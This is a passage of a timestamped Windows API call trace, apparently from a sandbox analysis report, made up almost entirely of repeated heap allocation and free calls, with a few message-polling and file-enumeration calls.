hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0189.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345758 | out: hHeap=0x2c0000) returned 1 [0189.891] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8785c10, ftCreationTime.dwHighDateTime=0x1d89766, ftLastAccessTime.dwLowDateTime=0x387011e0, ftLastAccessTime.dwHighDateTime=0x1d898de, ftLastWriteTime.dwLowDateTime=0x387011e0, ftLastWriteTime.dwHighDateTime=0x1d898de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j ucK2lALp_iPp", cAlternateFileName="JUCK2L~1")) returned 0 [0189.891] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0189.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0189.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0189.892] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0189.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0189.892] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0189.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0189.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0189.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.918] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0189.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0189.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0189.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0189.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0189.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0189.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0189.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0189.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0189.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 